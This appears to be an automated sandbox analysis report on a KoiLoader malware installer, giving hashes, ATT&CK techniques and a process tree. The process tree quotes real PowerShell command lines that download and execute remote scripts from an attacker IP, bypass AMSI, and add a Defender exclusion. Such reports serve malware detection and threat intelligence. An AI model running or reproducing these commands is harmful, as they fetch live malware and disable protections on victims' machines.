koiloader | e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819

Analysis

max time kernel
142s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/11/2024, 22:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mysetup.exe
Size

2.2MB
MD5

5cb042f9877f5876a19c86ded15fb1f8
SHA1

12249b4e9e8f5a3d66259d9172f8b6d4225812ab
SHA256

e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819
SHA512

f6c4c9198de1d3a18815db38e50f36f7f73103a050f07c73ad83e05371a7a13be985a84c437ce27a74638d96fffda1eb860fa3b7923e47d020a3912cecd3f490
SSDEEP

49152:FBuZrEUcH4ytTJpIbxrvfqKIy029s4C1eH9K:jkLcH4ytItfgt29s4C1eH9K

Score

10^/10

koiloader discovery execution loader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://79.124.78.109/wp-includes/phyllopodan7V7GD.php

exe.dropper

http://79.124.78.109/wp-includes/barasinghaby.ps1

Extracted

Family

koiloader

http://79.124.78.109/flocking.php

Signatures

KoiLoader
KoiLoader is a malware loader written in C++.
loader koiloader
Koiloader family
koiloader

Detects KoiLoader payload 1 IoCs

loader

resource	yara_rule
behavioral2/memory/3360-53-0x0000000007960000-0x000000000796D000-memory.dmp	family_koi_loader

Blocklisted process makes network request 6 IoCs

flow	pid	Process
6	2676	powershell.exe
14	3360	powershell.exe
17	3360	powershell.exe
18	2668	powershell.exe
38	3360	powershell.exe
45	3360	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3360	powershell.exe
4680	powershell.exe
2676	powershell.exe
2668	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
2956	mysetup.tmp

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mysetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mysetup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2676	powershell.exe
2676	powershell.exe
3360	powershell.exe
3360	powershell.exe
4680	powershell.exe
4680	powershell.exe
2668	powershell.exe
2668	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	3360	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 2956	2372	mysetup.exe	83
PID 2372 wrote to memory of 2956	2372	mysetup.exe	83
PID 2372 wrote to memory of 2956	2372	mysetup.exe	83
PID 2956 wrote to memory of 2676	2956	mysetup.tmp	84
PID 2956 wrote to memory of 2676	2956	mysetup.tmp	84
PID 2676 wrote to memory of 3956	2676	powershell.exe	86
PID 2676 wrote to memory of 3956	2676	powershell.exe	86
PID 3956 wrote to memory of 3360	3956	wscript.exe	88
PID 3956 wrote to memory of 3360	3956	wscript.exe	88
PID 3956 wrote to memory of 3360	3956	wscript.exe	88
PID 2168 wrote to memory of 836	2168	DllHost.exe	98
PID 2168 wrote to memory of 836	2168	DllHost.exe	98
PID 2168 wrote to memory of 836	2168	DllHost.exe	98
PID 836 wrote to memory of 4680	836	cmd.exe	100
PID 836 wrote to memory of 4680	836	cmd.exe	100
PID 836 wrote to memory of 4680	836	cmd.exe	100
PID 3360 wrote to memory of 1864	3360	powershell.exe	101
PID 3360 wrote to memory of 1864	3360	powershell.exe	101
PID 3360 wrote to memory of 1864	3360	powershell.exe	101
PID 1864 wrote to memory of 2668	1864	cmd.exe	105
PID 1864 wrote to memory of 2668	1864	cmd.exe	105
PID 1864 wrote to memory of 2668	1864	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\mysetup.exe
"C:\Users\Admin\AppData\Local\Temp\mysetup.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Users\Admin\AppData\Local\Temp\is-D68PA.tmp\mysetup.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-D68PA.tmp\mysetup.tmp" /SL5="$7002E,1414311,832512,C:\Users\Admin\AppData\Local\Temp\mysetup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -command IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\vqPM0l4stR.js'); wscript ($env:temp+'\vqPM0l4stR.js');
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2676
  - - C:\Windows\system32\wscript.exe
      "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3956
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'http://79.124.78.109/wp-includes/phyllopodan7V7GD.php'; $l2 = 'http://79.124.78.109/wp-includes/barasinghaby.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zWF7V63A272'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3360
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:836
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4680

C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\r4fc725d8-4f7d-4884-b878-08bb0ce6c800r.js"
1⤵
PID:4460

C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\r4fc725d8-4f7d-4884-b878-08bb0ce6c800r.js"
1⤵
PID:3468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
255B

MD5
8748a7d9b00db702fb676bafc9596c0a

SHA1
58ea79b800918f6bd24ba5a7a572b5692917ef9a

SHA256
49ab913e7d4032bdc7ae100b6fe8ba8d8a7be118286161686facd186045df9c7

SHA512
6de186ea5fcc830c010ee42f86953ed0f77944d86f25d4a29402fe33ec9447ab8dfbe16a78357c8c6302e3c0a4c21b2b4af79f4083bc4425a9b84ee5231910db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jslqsrbr.sta.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-D68PA.tmp\mysetup.tmp

Filesize
3.1MB

MD5
75ff4b69506691689c816c05782e97e7

SHA1
232ca459d1a83d8794ee30c96422a77739a57ad4

SHA256
f5416883c1a43a0b96e48c1da17d38c586f8d6a9b7d9978845e119df4c98f76f

SHA512
3c0e0d41d899f19933aabc0a8f86ce9b9c4d1ea6bdac74f07ee95792be6bcbb7b9b4ce0c2fe148024077a28287b742971ad788f5c08b3e90d47099e1664b06bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js

Filesize
1KB

MD5
07b4ac5bb1f8a6f4408f9cb8a7d1324c

SHA1
29b802ed0f09defc247f39fd329d0cc18f799be6

SHA256
eb5ef2cb5cc4682a886b91e43ae324804316e729b3cc16f389115667664a39c8

SHA512
693ff38b89e43353b8d9bb60b14337d0364c50e97f092db8aaeb0cc6ba19cfc367bedd49081b9f12391023e489d5d03a93366cf005278ff8866d432e0e1dff69

Download Submit
memory/2372-0-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2372-2-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/2372-12-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2668-101-0x0000000007A10000-0x0000000007AA2000-memory.dmp

Filesize
584KB

Download
memory/2668-100-0x0000000007920000-0x0000000007970000-memory.dmp

Filesize
320KB

Download
memory/2668-99-0x0000000007870000-0x000000000788A000-memory.dmp

Filesize
104KB

Download
memory/2668-98-0x0000000007E20000-0x00000000083C4000-memory.dmp

Filesize
5.6MB

Download
memory/2668-97-0x0000000007730000-0x0000000007752000-memory.dmp

Filesize
136KB

Download
memory/2676-25-0x00007FFBB5140000-0x00007FFBB5C01000-memory.dmp

Filesize
10.8MB

Download
memory/2676-29-0x00007FFBB5140000-0x00007FFBB5C01000-memory.dmp

Filesize
10.8MB

Download
memory/2676-24-0x00007FFBB5140000-0x00007FFBB5C01000-memory.dmp

Filesize
10.8MB

Download
memory/2676-14-0x00000213CBAD0000-0x00000213CBAF2000-memory.dmp

Filesize
136KB

Download
memory/2676-13-0x00007FFBB5143000-0x00007FFBB5145000-memory.dmp

Filesize
8KB

Download
memory/2956-10-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/2956-6-0x0000000000400000-0x000000000071C000-memory.dmp

Filesize
3.1MB

Download
memory/3360-50-0x0000000006650000-0x000000000666A000-memory.dmp

Filesize
104KB

Download
memory/3360-48-0x0000000006270000-0x000000000628E000-memory.dmp

Filesize
120KB

Download
memory/3360-51-0x0000000007AD0000-0x000000000814A000-memory.dmp

Filesize
6.5MB

Download
memory/3360-52-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/3360-53-0x0000000007960000-0x000000000796D000-memory.dmp

Filesize
52KB

Download
memory/3360-32-0x0000000004CD0000-0x0000000004D06000-memory.dmp

Filesize
216KB

Download
memory/3360-49-0x00000000062A0000-0x00000000062EC000-memory.dmp

Filesize
304KB

Download
memory/3360-33-0x00000000053C0000-0x00000000059E8000-memory.dmp

Filesize
6.2MB

Download
memory/3360-34-0x00000000052D0000-0x00000000052F2000-memory.dmp

Filesize
136KB

Download
memory/3360-35-0x0000000005B60000-0x0000000005BC6000-memory.dmp

Filesize
408KB

Download
memory/3360-36-0x0000000005C40000-0x0000000005CA6000-memory.dmp

Filesize
408KB

Download
memory/3360-42-0x0000000005CB0000-0x0000000006004000-memory.dmp

Filesize
3.3MB

Download
memory/4680-67-0x0000000071040000-0x000000007108C000-memory.dmp

Filesize
304KB

Download
memory/4680-92-0x0000000007030000-0x0000000007044000-memory.dmp

Filesize
80KB

Download
memory/4680-93-0x0000000007130000-0x000000000714A000-memory.dmp

Filesize
104KB

Download
memory/4680-94-0x0000000007110000-0x0000000007118000-memory.dmp

Filesize
32KB

Download
memory/4680-91-0x0000000007020000-0x000000000702E000-memory.dmp

Filesize
56KB

Download
memory/4680-90-0x0000000006FF0000-0x0000000007001000-memory.dmp

Filesize
68KB

Download
memory/4680-89-0x0000000007070000-0x0000000007106000-memory.dmp

Filesize
600KB

Download
memory/4680-79-0x0000000006E60000-0x0000000006E6A000-memory.dmp

Filesize
40KB

Download
memory/4680-78-0x0000000006CC0000-0x0000000006D63000-memory.dmp

Filesize
652KB

Download
memory/4680-77-0x0000000006C60000-0x0000000006C7E000-memory.dmp

Filesize
120KB

Download
memory/4680-66-0x0000000006C80000-0x0000000006CB2000-memory.dmp

Filesize
200KB

Download